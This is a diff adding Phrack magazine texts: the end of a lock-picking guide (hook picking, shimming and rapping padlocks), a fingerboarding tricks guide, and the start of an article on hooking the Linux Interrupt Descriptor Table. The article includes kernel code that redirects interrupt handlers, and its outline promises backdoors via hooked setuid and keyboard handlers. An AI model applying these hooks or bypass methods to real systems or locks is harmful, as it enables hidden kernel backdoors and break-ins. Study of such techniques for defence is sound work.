+                         /\__)    \
+                         |        |
+                         \________/
+
+                           FIG. 28
+
+
+Chapter 9:      PURE PICKING
+
+I like to think of my next section as 'pure picking', because that is 
+precisely what we do. Each pin is lifted in turn, lifting the driver clear 
+of the plug. Remember that earlier I advised the beginner to remove a couple 
+of set of pins and drivers. This is perhaps when you will find this most 
+useful. Turning is applied by the turning tool, or my own bent cam motion. 
+The HOOK PICKS shown in FIG. 29 are used.
+
+
+                                                Pure picking
+                          -------------------
+      --.    \        Top         __  __  __
+        |    |        Chambers   |==||==||==|
+       / \  / \        '-------> |==||==||--|
+       | |  | |              ____|--||--|'--|___ <--- Shear Line
+       | |  | |                  '--''--'.__.
+       | |  | |                  .--..--.|  |
+       | |  | |                  '--''--''--'
+       | |  | |                           ( )_______________
+       | |  | |                            \_______________/
+       | |  | |                   ___________________
+       | |  | |                   Hook lifting Pin to
+       '-'  '-'                      Shearing Line
+
+      Hook Picks
+                     FIG. 30
+
+        FIG. 30
+
+  It requires a fair measure of practice, and even more patience, but the 
+rewards once you are a master of this technique are more than words can 
+convey. Using whatever method you choose to turn the plug, FIG. 30 shows the 
+pick lifting the pins one at a time until they are pushed out of the plug 
+into the top chambers. All the time, a very gentle turning motion has been 
+applied by means of the turning tool. FIG. 31 shows the lock set to open.
+
+
+
+
+         Set to open
+                   ___  ___  ___
+                  | = || = || = |
+                  |.-.||.-.||.-.|            Notice how the
+  Shear line   ___|'-'||'-'||'-'|___         bottom pins line
+                    _    _    _   <--------- up precisely on
+                   | |  | |  | |             the shear line
+                   '-'  '-'  '-'
+
+            FIG. 31
+
+
+
+                        ____________
+                  U----(____________)   Small
+                        ____________
+                  \----(____________)   Medium
+                        ____________
+                  |____(____________)   Large
+
+               Three sizes of Hook Picks
+
+                          FIG. 32
+
+Use the correct size of hook pick, by first trying the smallest. see FIG. 
+32. Practice this, and you will have a gem.
+
+
+Chapter 10:      OPENING LOCKS WITHOUT ACTUAL PICKING
+
+FIG. 33 some points of attack which you will find convenient, and which have 
+been unknowingly built into the lock's construction by the manufacturer. The 
+method is known as shimming. FIG. 34 shows a collection of springs and 
+probes. go along to your local watchmaker and obtain as many as you can. Add 
+to this blades from junior hacksaws, coping and fretsaws and you will soon 
+have a fine collection.
+
+   FIG. 33
+                    ________   X
+            X      / ______ \ /
+             \    / /      \ \
+              \__/ /________\ \__
+              |\ |_|_------ | |  |
+              |  |_,-.----.#| |  |
+         X----|--| ||_.--._||=|  |
+              |  '-' .-''-. |=|  |
+              |      |    | |=|  |
+              |      |    | |=|  |
+              |      '----' '='  |
+              |__________________|
+
+              Old Clock springs
+_____________   ________________  _________________
+|_____________| [________________]'-----------------' Small,Med,Large
+
+         Saw Blades
+____________\_
+______________) -----------------,  __________________
+               \ VVVVVVVVVVVVVVVVV   vvvvvvvvvvvvvvvvvv'
+                          FIG. 34
+
+  Taking advantage of the lock's weak points, we insert our clock spring or 
+saw blade between the point where the two halves of the lock case meet, or 
+down the side of the shackle, following the line of the bow, and so pushing 
+back the spring-loaded bolt.
+
+
+CHAPTER 11:      RAPPING OPEN LOCKS
+
+Look at my FIG. 35, which shows a pin-tumbler lock about to be opened by 
+rapping. the blow must be sharp but not heavy.
+
+                          ___   Sharp
+                         |   |  Blow
+   FIG. 35              _|   |_
+                        \     /        Pins
+                         \   /    __   line up
+                          \ /    |  |  on the
+                   ________V_____|  |  Shear Line
+Blow causes       |  __  _ _ _ _    |
+the pins and      | |==||=|=|=|=|   |
+drivers to        |-|V ||V|V|V|V|___| Shearing
+vibrate      -----| |^ ||^|^|^|^|   |-------
+                  | |V ||V|V|V|V|   | Line
+                  | |--||-|-|-|-|   |
+                  | '--''-'-'-'-'   |
+                  '______________   |
+                                 |  |
+                                 |__|
+
+                   How Rapping works
+
+  The blow should be only to the point shown. It has the effect of causing 
+the pins to vibrate and to split at the shearing line, as in raking and the 
+lock gun methods. Just as in the other methods, we use the turning tool 
+together with the pulsating movement. Try rapping open a spring-loaded bow 
+(shackle) padlock before you try a pin-tumbler or wafer lock. (See FIG. 36)
+
+                                ______
+                               /,^--. \
+                           __     __/ /
+                          /  \___/ / /
+                         / ---.  __  \
+                        /   _/  (     \
+                       /   C.   /      \
+                       \   \\     (o)  /  <--- Sharp blow at this
+                        \   \,     |  /        point opens the lock
+                         \___________/
+
+Vibration causes lock to open like magic
+
+
+TOOLS AND APPARATUS
+FOR USE IN LOCK PICKING
+
+1  Small vice, from watchmaker's suppliers, with 2" jaws.
+2  A selection of small files, from watchmaker's suppliers.
+3  A junior hacksaw from hardware stores.
+4  A selection of saw blades, from hardware stores.
+5  Leaf gauges, from a garage.
+6  Piano wire, from music shop.
+7  Lock picks, from locksmiths.
+8  Old clock springs, from local watchmaker.
+9  Wire cutters, from hardware stores.
+10 Collection of blank keys, from locksmiths.
+11 Lock gun from locksmiths.
+12 Oil, from hardware stores.
+13 Lots of old locks, from friends.
+14 Pencil torch.
+15 Strong magnifying glass.
+16 Patience, and a bottomless coffee pot.
+
+  Get together as many locks of all types as possible. ask your friends if 
+they can find you any old locks for which they have lost the keys. After 
+experimenting with the locks, open them up to find out how they work. This 
+is the finest way to becoming a true lock expert.
+
+  If you are beaten by a particular lock, dont despair. I know the feeling 
+all to well. it's back to the drawing board, or, more correctly, the 
+workshop. Open it up, study it's workings, then re-assemble. always LOOK FOR 
+ITS WEAK POINTS. believe me, it will have some; you just have to look long 
+enough and hard enough. Locks are like a chain, as strong as the weakest 
+link.
+
+|=[ 0x04 ]=--------------------------------------------------------------=|
+
+Spyke's Beginner Guide 2
+
+FFF III N  N GGG EEE RRR  BBB OOO AAA RRR DD  III N  N GGG
+F    I  NN N G   E   R R  B B O O A A R R D D  I  NN N G
+FFF  I  N NN G   EEE RRR  BBB O O AAA RRR D D  I  N NN G
+F    I  N  N G G E   RR   B B O O A A RR  D D  I  N  N G G
+F   III N  N GGG EEE R R  BBB OOO A A R R DD  III N  N GGG
+~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
+
+                               (Like anyone wants to know..
+                                  Just somin' to do in your
+                                               Spare time!)
+
+~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
+
+Sections
+--------
+
+1. How to perform ollies
+2. How to perform Backflips
+3. How to perform shuv-its (in air)
+4. How to perform Grinds
+   4.1 Boardslide
+   4.2 Darkslide
+5. How to get a fingerboard
+
+~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
+
+Section : 1. How to perform ollies
+==================================
+
+The ollie is possibly the first fingerboarding trick in
+which you should learn. It allows you to pop your finger-
+board into the air with your fingers allowing you to jump
+Onto OR over (small) objects.
+  the first part of the ollie is to put you fingers in the
+correct possition (as you can see in {Fig. A}) with one
+finger flat on the tail and another right behind were the
+trucks are on the top.
+
+{Fig. A}
+                            Key
+                            -------
+                            F=Finger      \=Left Tail  0=Wheel
+                            /=Right Tail  ^=Trucks     _=Part of deck
+
+\____F__________F/
+   ^0^        ^0^
+
+Next you hit the tail (with the finger that is placed on
+on the tail) lift hand and push forwards.
+  After practice you //should// be able to get the board
+into the air a few inchs ({Fig. B}).
+
+{Fig. B}
+
+|
+0\F
+   \
+    \
+     \
+      \
+      0\_F
+
+
+~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
+
+Section : 2. How to perform Backflips
+=====================================
+
+The back flip on a finger board if diffurent to a backflip
+on a skateboard in the way that your fingers do not flip
+360 degrees verticly (That would break your wrist) but they
+hover above the board while it flips.
+  Firstly put your fingers into the ollie postition (Shown
+above in {Fig. A}), and hit the tail hard. Quickly lift
+your fingers up into the air and the board //should// flip
+in the air verticaly. Now for the hard bit : wait until
+the board flips 360 degrees then drop your fingers so it
+lands the correct way up,this movemnt has to be farely
+fast to work.
+
+
+~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
+
+Section : 3. How to perform shuv-its (in Air)
+=============================================
+
+The shuv-it (in Air) is were you ollie your board so
+it spins 180 degrees horizontaly.
+  To do this trick you must place your fingers in the ollie
+postition but with the tail-finger on the side on the board,
+not the middle (Shown in {Fig. C}), next you ollie but when
+you hit the tail you also turn you hand a little bit.
+
+{Fig. C}
+
+   ______________________F
+  / . .               . . \
+ |  . .F              . .  |
+  \_______________________/
+
+
+When the board is (hopefully) spinning in the air hit it
+down after it has made a full 180 degree turn.
+
+~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
+
+Section : 4. How to perform Grinds
+==================================
+
+To grind, ollie the board onto the edge of somthing OR
+onto a pencil of bar.
+
+Section : 4.1 Boardslide
+------------------------
+
+Ollie the board and turn it 90 degrees in the air
+onto a thin object/edge of somthing then, push smoothly
+across (Refer to {Fig. D}), to land push the board off
+the object and turn 90 degrees back to the orginal
+position.
+
+{Fig. D}
+
+
+          _
+         /F\
+        |. .|
+        |. .|
+        |   |
+ -------|   |-------
+ -------|   |--------Grinding Object
+        | F |
+        |. .|
+        |. .|
+         \_/
+
+Section : 4.2 Darkslide
+-----------------------
+
+The darkslide is a grinding trick were you flip the board
+upside down, grind it upside down, then flip it the
+correct way up. It is technically an upside-down
+Boardslide.
+  Firstly put your fingers into an ollie postition and move
+the board towards the grinding objects, when you are close
+annouf to ollie onto it, flip your board 180 degrees so
+it is upside down, and push it onto the grinding object.
+  Push it forwards assuming pressure to the front, when you
+get to the end of the grinding object attemp to flip the
+board the correct way up.
+
+
+Section : 5 How to get a fingerboard
+====================================
+
+    Search in some local shops near you or buy them online from:
+
+              http://www.skateboard.com/techdeckshop/
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack59/4.txt b/phrack59/4.txt
new file mode 100644
index 0000000..2999eff
--- /dev/null
+++ b/phrack59/4.txt
@@ -0,0 +1,2573 @@
+                          ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x04 of 0x12
+
+|=-----=[ Handling Interrupt Descriptor Table for fun and profit ]=------=|    
+|=-----------------------------------------------------------------------=|
+|=----------------=[ kad, <kadamyse@altern.org> ]=-----------------------=|
+
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - Presentation 
+    2.1 - What is an interrupt?
+    2.2 - Interrupts and exceptions
+    2.3 - Interrupt vector
+    2.4 - What is IDT?
+
+  3 - Exceptions 
+    3.1 - List of exceptions
+    3.2 - Whats happening when an exception appears ? 
+    3.3 - Hooking by mammon
+    3.4 - Generic interrupt hooking
+    3.5 - Hooking for profit : our first backdoor
+    3.6 - Hooking for fun
+
+  4 - The hardware interrupt
+    4.1 - How does It work ?
+    4.2 - Initialization and activation of a bottom half
+    4.3 - Hooking of the keyboard interrupt
+
+  5 - Exception programmed for the system call 
+    5.1 - List of syscalls
+    5.2 - How does a syscall work ?
+    5.3 - Hooking for profit
+        5.3.1 - Hooking of sys_setuid
+        5.3.2 - Hooking of sys_write
+    5.4 - Hooking for fun 
+
+  6 - CheckIDT
+
+  7 - References & Greetz
+
+  8 - Appendix
+
+
+--[ 1 - Introduction
+
+    The Intel CPU can be run in two modes: real mode and protected mode.
+The first mode does not protect any kernel registers from being altered
+by userland programs. All modern Operating System make use of the
+protected mode feature to restrict access to critical registers by
+userland processes. The protected mode offers 4 different 'privilege
+levels' (ranging from 0..3, aka ring0..ring3). Userland applications
+are usually executed in ring3. The kernel on the other hand is executed 
+in the most privileged mode, ring0. This grants the kernel full access
+to all CPU registers, all parts of the hardware and the memory. With no
+question is this the mode of choice to do start some hacking.
+
+    The article will demonstrate techniques for modifying the Interrupt
+Descriptor Table (IDT) on Linux/x86. Further on will the article explain
+how the same technique can be used to redirect system calls to achieve
+similar capability as with Loadable Kernel Modules (LKM).
+
+    The presented examples in this article will only make use of LKM to
+load the executable code into kernel space for simplicity reasons. Other
+techniques which are not scope of this document can be used to either
+load the executable code into the kernel space or to hide the kernel
+module (Spacewalker's method for example).
+
+    CheckIDT which is a useful tool for examining the IDT and to avoid
+kernel panics every 5 minutes is provided at the end of that paper.
+
+
+--[ 2 - Presentation
+
+----[ 2.1 - What's an interrupt?
+
+    "An interrupt is usually defined as an event that alters the
+sequence of instructions executed by a processor. Such events correspond to
+electrical signals generated by hardware circuits both inside and outside
+of the CPU chip."
+(from: "Understanding the Linux kernel," O'Reilly publishing.)
+
+
+----[ 2.2 - Interrupts and exceptions
+
+    The Intel reference manual refers to "synchronous interrupts" (those
+which are produced by the CPU Control Unit (CU) after the execution of an
+instruction has been finished) as "exceptions". Asynchronous interrupts
+(those which are generated by other hardware devices at arbitrary time) are
+referred to as just "interrupts". Interrupts are issued by external I/O
+devices whereas exceptions are caused either by programming errors or by
+anomalous conditions that must be handled by the kernel. The term
+"Interrupt Signals" will be used during this article to refer to both,
+exceptions and interrupts.
+
+    Interrupts are split into two categories: Maskable interrupts which can
+be ignored (or 'masked') for a short time period and non-maskable
+interrupts which must be handled immediately. Unmaskable interrupts are
+generated by critical events such as hardware failures; I won't deal
+with them here. The well-known IRQs (Interrupt ReQuests) fall into the
+category of maskable interrupts.
+
+    Exceptions are split into two different categories: Processor
+generated exceptions (Faults, Traps, Aborts) and programmed exceptions
+which can be triggered by the assembler instructions int or int3. The
+latter one are often referred to as software interrupts.
+
+
+----[ 2.3 - Interrupt vector
+
+Each interrupt or exception is identified by a number between 0 and 255.
+Intel calls this number a vector. The numbers are classified like this:
+
+- From 0 to 31   : exceptions and non-maskable interrupts
+- From 32 to 47  : maskable interrupts
+- From 48 to 255 : software interrupts
+
+Linux uses only one software interrupt (0x80) which is used for the
+syscall interface to invoke kernel functions.
+
+Hardware IRQs (Interrupt ReQuest) from IRQ0..IRQ15 are assigned to
+the interrupt vectors 32..47.
+
+
+----[ 2.4 - What is IDT ? 
+
+IDT = Interrupt Descriptor Table
+
+The IDT is a linear table of 256 entries which associates an interrupt
+handler with each interrupt vector.
+Each entry of the IDT is a descriptor of 8 bytes which blows the entire
+IDT up to a size of 256 * 8 = 2048 bytes.
+The IDT can contain three different types of descriptors/entries:
+
+- Task Gate Descriptor
+        
+        Linux does not use this descriptor
+
+- Interrupt Gate Descriptor
+
+63                      48|47           40|39              32  
++------------------------------------------------------------
+|                         | |D|D| | | | | | | | |           
+| HANDLER OFFSET (16-31)  |P|P|P|0|1|1|1|0|0|0|0| RESERVED  
+|                         | |L|L| | | | | | | | |           
+=============================================================
+                          |                                 |
+  SEGMENT SELECTOR        |   HANDLER OFFSET (0-15)         |
+                          |                                 |
+------------------------------------------------------------+
+31                      16|15                               0
+
+        - bits  0 to 15 : handler offset low
+        - bits 16 to 31 : segment selector
+        - bits 32 to 37 : reserved
+        - bits 37 to 39 : 0
+        - bits 40 to 47 : flags/type 
+        - bits 48 to 63 : handler offset high
+
+- Trap Gate Descriptor
+
+        Same as the previous one, but the flag is different
+
+The flag is composed as next :
+
+        - 5 bits for the type
+                interrupt gate       : 1 1 1 1 0
+                trap  gate          : 0 1 1 1 0        
+        - 2 bits for DPL
+                DPL = descriptor privilege level
+        - 1 bit reserved
+
+    Offset low and offset high contain the address of the function handling
+the interrupt. This address is jumped at when an interrupt occurs. The goal
+of the article is to change one of these addresses and let our own 
+interrupthandler beeing executed.
+
+DPL=Descriptor Privilege Level
+
+    The DPL is equal to 0 or 3. Zero is the most privileged level (kernel
+mode).  The current execution level is saved in the CPL register (Current
+Privilege Level). The UC (Unit Of Control) compares the value of the CPL
+register against the DPL field of the interrupt in the IDT. The interrupt
+handler is executed if the DPL field is greater (less privileged) or equal
+to the value in the CPL register. Userland applications are executed in
+ring3 (CPL==3). Certain interrupt handlers can thus not be invoked by
+userland applications.
+
+    The IDT is initialized one first time by the BIOS routine but Linux
+does it one more time when it take control. The asm lidt function
+initialize the idtr registry which will contain the size and idt's address.
+Then the setup_idt function fill the 256 entry of the idt with the same
+interrupt gate, ignore_int. Then the good gate will be inserted into the
+idt by the next functions:
+
+linux/arch/i386/kernel/traps.c::set_intr_gate(n, addr)
+        insert an interrupt gate at the n place at the address
+        pointed to by the idt register. The interrupt handler's address
+        is stored in 'addr'.
+        
+linux/arch/i386/kernel/irq.c
+All maskable interrupts and software interrupts are initialized with:
+	set_intr_gate :
+        
+#define FIRST_EXTERNAL_VECTOR  0x20
+
+                for (i = 0; i < NR_IRQS; i++) {
+                int vector = FIRST_EXTERNAL_VECTOR + i;
+                if (vector != SYSCALL_VECTOR) 
+                        set_intr_gate(vector, interrupt[i]);    
+
+        
+linux/arch/i386/kernel/traps.c::set_system_gate(n, addr)
+        insert a trap gate.
+	The DPL field is set to 3.
+
+These interrupts can be invoked from the userland (ring3).
+
+                set_system_gate(3,&int3)
+                set_system_gate(4,&overflow)
+                set_system_gate(5,&bounds)
+                set_system_gate(0x80,&system_call);
+        
+linux/arch/i386/kernel/traps.c::set_trap_gate(n, addr)
+        insert a trap gate with the DPL field set to 0.
+        The Others exception are initialized with set_trap_gate : 
+        
+                set_trap_gate(0,&divide_error)
+                set_trap_gate(1,&debug)
+                set_trap_gate(2,&nmi)
+                set_trap_gate(6,&invalid_op)
+                set_trap_gate(7,&device_not_available)
+                set_trap_gate(8,&double_fault)
+                set_trap_gate(9,&coprocessor_segment_overrun)
+                set_trap_gate(10,&invalid_TSS)
+                set_trap_gate(11,&segment_not_present)
+                set_trap_gate(12,&stack_segment)
+                set_trap_gate(13,&general_protection)
+                set_trap_gate(14,&page_fault)
+                set_trap_gate(15,&spurious_interrupt_bug)
+                set_trap_gate(16,&coprocessor_error)
+                set_trap_gate(17,&alignement_check)
+                set_trap_gate(18,&machine_check)
+        
+
+    IRQ interrupts are initialized by set_intr_gate(), Exception int3,
+overflow, bound and the system_call software interrupt by set_system_gate().
+All others exceptions are initialized by set_trap_gate().  
+
+
+    Let's start over with some practice and examine the currently assigned
+handler addresses for each interrupt. Use the tool CheckIDT [6] attached
+to this article for this:
+
+%./checkidt -A -s
+
+Int *** Stub Address * Segment *** DPL * Type             Handler Name
+--------------------------------------------------------------------------
+0       0xc01092c8     KERNEL_CS   0     Trap gate        divide_error
+1       0xc0109358     KERNEL_CS   0     Trap gate        debug
+2       0xc0109364     KERNEL_CS   0     Trap gate        nmi
+3       0xc0109370     KERNEL_CS   3     System gate      int3
+4       0xc010937c     KERNEL_CS   3     System gate      overflow
+5       0xc0109388     KERNEL_CS   3     System gate      bounds
+6       0xc0109394     KERNEL_CS   0     Trap gate        invalid_op
+...
+18      0xc0109400     KERNEL_CS   0     Trap gate        machine_check
+19      0xc01001e4     KERNEL_CS   0     Interrupt gate   ignore_int
+20      0xc01001e4     KERNEL_CS   0     Interrupt gate   ignore_int
+...
+31      0xc01001e4     KERNEL_CS   0     Interrupt gate   ignore_int
+32      0xc010a0d8     KERNEL_CS   0     Interrupt gate   IRQ0x00_interrupt
+33      0xc010a0e0     KERNEL_CS   0     Interrupt gate   IRQ0x01_interrupt
+...
+47      0xc010a15c     KERNEL_CS   0     Interrupt gate   IRQ0x0f_interrupt
+128     0xc01091b4     KERNEL_CS   3       System gate      system_call
+
+
+The System.map contains the symbol names to the addresses shown above.
+
+% grep c0109364 /boot/System.map 
+00000000c0109364 T nmi
+nmi=not maskable interrupt ->trap_gate
+
+% grep c010937c /boot/System.map 
+00000000c010937c T overflow
+overflow -> system_gate
+
+% grep c01001e4 /boot/System.map
+00000000c01001e4 t ignore_int 
+
+18 to 31 are reserved by Intel for further use
+
+% grep c010a0e0 /boot/System.map
+00000000c010a0e0 t IRQ0x01_interrupt 
+device keyboard ->intr_gate 
+
+% grep c01091b4 /boot/System.map 
+00000000c01091b4 T system_call 
+system call  -> system_gate
+
+rem: there is a new option in checkIDT for resolving symbol
+
+
+--[ 3 - Exceptions 
+
+----[ 3.1 - List of  exceptions
+
+--------------------------------------------------------------------------+
+number  | Exception 			| Exception Handler               |
+--------------------------------------------------------------------------+
+0       | Divide Error			| divide_error()                  |
+1       | Debug				| debug()                         |
+2       | Nonmaskable Interrupt  	| nmi()                           |
+3       | Break Point			| int3()		          |
+4       | Overflow			| overflow()                      |
+5       | Boundary verification		| bounds()                        |
+6       | Invalid operation code	| invalid_op()                    |
+7       | Device not available		| device_not_available()          |
+8       | Double Fault                	| double_fault()                  |
+9       | Coprocessor segment overrun	| coprocesseur_segment_overrun()  |
+10      | TSS not valid			| invalid_tss()                   |
+11      | Segment not  present		| segment_no_present()            |
+12      | stack exception 		| stack_segment()                 |
+13      | General Protection 		| general_protection()            |
+14 	| Page Fault			| page_fault()                    |
+15      | Reserved by Intel		| none                            |
+16      | Calcul Error with float virgul| coprocessor_error()             |
+17      | Alignement check		| alignement_check()              |
+18      | Machine Check			| machine_check()                 |
+--------------------------------------------------------------------------+
+
+Exceptions are divided into two categories:
+- processor detected exceptions (DPL field set to 0)
+- software interrupts (aka programmed exceptions), (DPL field set to 3).
+
+The latter one can be invoked from userland.
+
+
+----[ 3.2 - Whats happening when an exception occurs ?
+
+    On the occurrence of an exception the corresponding handler address 
+from the current IDT is executed. This handler is not the real handler who
+deals with the exception, it's just jumps till the true/good handler.
+
+To be clearer : 
+
+exception -----> intermediate Handler -----> Real Handler
+
+entry.S defines all the intermediate Handler, also called Generic Handler
+or stub. The first Handler is written in asm, the real Handler written in
+C.
+
+For not being confused, lets call the first handler : asm Handler
+and the second one the C Handler.
+
+let's have a look at entry.S :
+
+entry.S :
+---------
+
+**************************************************
+ENTRY(nmi)
+        pushl $0
+        pushl $ SYMBOL_NAME(do_nmi)
+        jmp error_code
+
+ENTRY(int3)
+        pushl $0
+        pushl $ SYMBOL_NAME(do_int3)
+        jmp error_code
+
+ENTRY(overflow)
+        pushl $0
+        pushl $ SYMBOL_NAME(do_overflow)
+        jmp error_code
+
+ENTRY(divide_error)
+
+        pushl $0                # no error value/code
+        pushl $ SYMBOL_NAME(do_divide_error)
+        ALIGN
+error_code:                             
+        pushl %ds
+        pushl %eax
+        xorl %eax,%eax
+        pushl %ebp
+        pushl %edi
+        pushl %esi
+        pushl %edx
+        decl %eax                       # eax = -1
+        pushl %ecx
+        pushl %ebx
+        cld
+        movl %es,%cx
+        movl ORIG_EAX(%esp), %esi       # get the error value
+        movl ES(%esp), %edi             # get the function address
+        movl %eax, ORIG_EAX(%esp)
+        movl %ecx, ES(%esp)
+        movl %esp,%edx
+        pushl %esi                      # push the error code
+        pushl %edx                      # push the pt_regs pointer
+        movl $(__KERNEL_DS),%edx
+        movl %dx,%ds
+        movl %dx,%es
+        GET_CURRENT(%ebx)
+        call *%edi
+        addl $8,%esp
+        jmp ret_from_exception
+**********************************************
+
+Let's examine the above:
+
+    ALL handlers have the same structure (only system_call and
+device_not_available are different): 
+
+pushl $0 
+pushl $ SYMBOL_NAME(do_####name)
+jmp error_code
+
+    Pushl $0 is only used for some exceptions. The UC is supposed to smear
+the hardware error value of the exception onto the stack. Some exceptions
+to not generate an error value and $0 (zero) is pushed instead. The last
+line jumps to error_code (see linux/arch/i386/kernel/entry.S for details).
+
+error code is an asm macro used by the exceptions.
+
+so let's resume once again
+
+exception ---> intermediate Handler ---> error_code macro ---> Real Handler
+
+The Assembly fragment error_code performs the following steps:
+
+1: Saves the registers that might be used by the high-level C function on
+   the stack.
+
+2: Set eax to -1.
+
+3: Copy the hardware error value ($esp + 36) and the handler's address
+   ($esp + 32) in esi and edi respectively.
+
+        movl ORIG_EAX(%esp), %esi     
+        movl ES(%esp), %edi             
+
+
+4: Place eax, which is equal to -1, at the error code emplacement.
+   Copy the content of es to the stack location at $esp + 32.
+ 
+5: Save the the stack's top Address into edx,then smear error_code which we
+   get back at point 3 and edx on the stack. 
+   The stack's top address must be saved for later use.
+
+6: Place the kernel data segment selector into the ds and es registry.
+
+7: Set the current process descriptor's address in ebx.
+
+8: Stores the parameters to be passed to the high-level C function on the
+   stack (e.g. the hardware exception value and the address and the stack
+   location of the saved registers from the user mode process).
+
+9: Call the exception handler (address is in edi, see 3).
+
+10: The two last instructions are for the back of the exception.
+
+error_code will jump to the suitable exception Manager. The one that's 
+gonna actually handle the exceptions (see traps.c for detailed 
+information). 
+
+So these ones are written in C.
+
+Let's take an exception handler as a concrete example. For example, the
+C handler for non maskable nmi interruption.
+
+rem: taken from traps.c
+
+**************************************************************
+asmlinkage void do_nmi(struct pt_regs * regs, long error_code)
+{
+        unsigned char reason = inb(0x61);
+        extern atomic_t nmi_counter;
+....
+**************************************************************
+
+asmlinkage is a macro used to keep params on the stack. As params are
+passed from asm code to C code through the stack, it would be bad to get
+unwanted params put on the top of the stack. Asmlinkage gonna resolve
+that point. 
+
+The function do_nmi gets a pointer of type pt_regs and error_code. 
+
+pt_regs is defined into  /usr/include/asm/ptrace.h:
+
+struct pt_regs {
+        long ebx;
+        long ecx;
+        long edx;
+        long esi;
+        long edi;
+        long ebp;
+        long eax;
+        int  xds;
+        int  xes;
+        long orig_eax;
+        long eip;
+        int  xcs;
+        long eflags;
+        long esp;
+        int  xss;
+};
+
+    A part of the registry are push on the stack by error_code, the others 
+are some registry pushed by the UC at the hardware level.
+
+This handler will handle the exception and almost all time send a signal to
+the process.
+
+
+----[ 3.3 - Hooking an interrupt (by Mammon)
+
+    Mammon wrote a txt on how to hook interrupt under linux. The technique
+I'm going to explain is similar to that of Mammon but will allow us
+to handle the interrupt in a more generic/comfortable way.
+
+Let's take int3, the breakpoint interrupt. The handler/stub is defines as
+following:
+
+ENTRY(int3)
+        pushl $0
+        pushl $ SYMBOL_NAME(do_int3)
+        jmp error_code
+
+    The C handler's address is pushed on the stack right after the dummy
+hardware error value (zero) has been saved. The assembly fragment
+error_code is executed next. Our approach is to rewrite such an asm handler
+and push our own handler's address on the stack instead of the original one
+(do_int3).
+
+Example:
+
+void stub_kad(void)
+        {
+__asm__ (
+        ".globl my_stub                 \n"
+        ".align 4,0x90                  \n"
+        "my_stub:                       \n"
+        "pushl $0                       \n"
+        "pushl ptr_handler(,1)          \n"
+        "jmp *ptr_error_code             "
+        ::
+        );
+        }
+
+    Our new handler looks similar to the original one. The surrounding
+statements are required to get it compiled with a C compiler.
+
+- We put our asm code into a function to make linking easier.
+- .globl my_stub, will allow us to reference the asm code if we declare
+  in global : extern asmlinkage void my_stub();
+- align 4,0x90, align the size of one word, on Intel processor the
+  alignement is 4 (32 bits).
+- push ptr_handler(,1) , conform to the gas syntax,we wont use it later.
+
+
+For more information about asm inline, see [1].  
+
+We push our Handler's address and we jump to error_code.
+
+ ptr_handler contain our C Handler's address :
+
+unsigned long ptr_handler=(unsigned long)&my_handler;
+
+The C Handler: 
+
+asmlinkage void my_handler(struct pt_regs * regs,long err_code)
+        {
+        void (*old_int_handler)(struct pt_regs *,long) = (void *)
+old_handler;
+        printk("<1>Wowowo hijacking of int 3 \n");
+        (*old_int_handler)(regs,err_code);
+        return;
+        }
+
+    We get back two argument, one pointer on the registry, and err_code.
+We have seen before that error_code push this two argument. We save the
+old handler's address,the one we was supposed to push (pushl
+$SYMBOL_NAME(do_int3)). We do a little printk to show that we hooked the
+interrupt and go back to the old handler.Its the same way as hooking a
+syscall with "classical method".
+
+What's old_handler ?
+
+#define do_int3    0xc010977c
+unsigned long old_handler=do_int3;
+
+do_int3 address have been catch from System.map. 
+
+rem : We can define a symbol's address on-the-fly.
+
+To be clearer  : 
+
+asm Handler
+----------------
+push 0
+push our handler
+jmp to error_code
+                
+error_code
+----------
+do some operation
+pop our handler address
+jmp to our C handler
+
+our C Handler                                                                    
+--------------------
+save the old handler's address
+print a message
+return to the real C handler
+
+Real C Handler
+-------------------
+really deal with the interrupt 
+
+
+    Now we have to change the first Handler's address in the corresponding
+descriptor in the IDT (offset_low and offset_high, see 2.4). The function
+accepts three parameters: The number of the interrupt hook, the new
+handler's address and a pointer to save the old handler's address.
+
+
+
+void hook_stub(int n,void *new_stub,unsigned long *old_stub)
+        {
+         unsigned long new_addr=(unsigned long)new_stub;
+         struct descriptor_idt *idt=(struct descriptor_idt *)ptr_idt_table;
+         //save old stub
+
+         if(old_stub)
+                *old_stub=(unsigned long)get_stub_from_idt(3);
+         //assign new stub
+         idt[n].offset_high = (unsigned short) (new_addr >> 16);
+         idt[n].offset_low  = (unsigned short) (new_addr & 0x0000FFFF);
+         return;
+        }
+
+unsigned long get_addr_idt (void)
+        {
+         unsigned char idtr[6];
+         unsigned long idt;
+        __asm__ volatile ("sidt %0": "=m" (idtr));
+        idt = *((unsigned long *) &idtr[2]);
+        return(idt);
+        }
+
+void * get_stub_from_idt (int n)
+        {
+        struct descriptor_idt *idte = &((struct descriptor_idt *)
+ptr_idt_table) [n];
+        return ((void *) ((idte->offset_high << 16 ) + idte->offset_low));
+        }
+
+struct descriptor_idt:
+
+struct descriptor_idt
+        {
+        unsigned short offset_low,seg_selector;
+        unsigned char reserved,flag;
+        unsigned short offset_high;
+        };
+
+We have seen that a descriptor is 64 bits long.
+
+unsigned short : 16 bits (offset_low,seg_selector and offset_high)
+unsigned char  : 8 bits  (reserved and flag)
+
+(3 * 16 bit ) + (2 * 8 bit) = 64 bit = 8 octet 
+
+It's a descriptor for the IDT. The only interesting fields are offset_high
+and offset_low. It's the two fields we will modify.   
+
+Hook_stub performs the following steps:
+
+1: We copy our handler's address into new_addr
+
+2: We make the idt variable point on the first IDT descriptor.
+   We got the IDT's address with the function get_addr_idt().
+   This function execute the asm instruction sidt who get the idt address 
+   and his size into a variable.
+   We get the idt's address from this variable (idtr) and we send it back.
+   This have been already explained by sd and devik in Phrack 58 article 7.    
+3: We save the old handler's address with the function get_stub_from_idt.
+   This function extract the fields offset_high and offset_low from the
+   gived descriptor and send back the address.
+  
+        struct descriptor_idt *idte = &((struct descriptor_idt *)
